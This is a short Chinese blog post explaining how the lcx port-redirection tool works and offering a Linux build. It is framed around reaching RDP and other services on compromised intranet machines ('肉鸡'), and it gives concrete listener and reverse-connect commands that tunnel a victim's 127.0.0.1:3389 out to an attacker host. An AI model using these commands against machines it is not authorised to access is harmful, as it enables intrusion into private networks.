兔八哥极品软件园    运行: 2754天 | 文章:583 篇 | 评论:3 条 | 碎语:1条

linux LCX 端口重定向以及在linux下的实现

作者:admin 发布于:2013-5-4 9:01 Saturday 分类:Linux


lcx.exe 经常给内网肉鸡丢3389后门以及内网渗透的大都很熟悉,平时使用都是照猫画虎用,不明白其中本质,今天找到源码,详细阐释下本质吧。

其中涉及到2条TCP连接已经2条端口转发,可能比较饶人,慢慢看吧。

平时大家都这样用 首先在自己主机上 lcx -listen  p1 p2  ,意思是在主机上监听 P1 和 P2 端口,

然后在鸡上   lcx -slave  主机IP p1  肉鸡IP p3 ,意思是连接 主机IP:p1 并把所有通信数据转发到 肉鸡IP:p3

然后用相关服务的客户端连接 主机IP:p2 ,例如3889连接器,即可连接到肉鸡相应的p3端口服务。因为主机自动把 主机IP:p2的任何数据都转发到

IP:p1上,而IP:p1与 肉鸡 已经有个可以通信的连接,最终肉鸡在把与  IP:p1 转发到相应的服务端口,即完成了通信,说的有点饶人还是上图吧。

 

网上基本都是windows下的实现,使用方法也就上面那样。

linux也有实现,感觉使用方法更加明朗,且与windows下的兼容 在此推荐下。

把windows的小做修改下,重新编译了下,源程序比较简单就不上传工程文件了,直接给个C文件,自己编译下即可。

linux下实现大同小异,只不过用的fork实现子线程。

源代码 lcx_src.zip

简单的例子,加入本机IP为116.228.111.18,某内网肉鸡开了3389.

1.本机  lcx -m 2 -p1 3333  -p2 3389

2.肉鸡  lcx  -m 3 -h1 116.228.111.18 -p1 3333 -h2 127.0.0.1 -p2 3389

3.在任何有网的地方包括自己主机都可以用 3389连接器 连接 116.228.111.18:3389即可。

其他服务同理,如 80 22 21 1433.


Powered by 兔八哥极品软件 苏ICP备12049267号 sitemap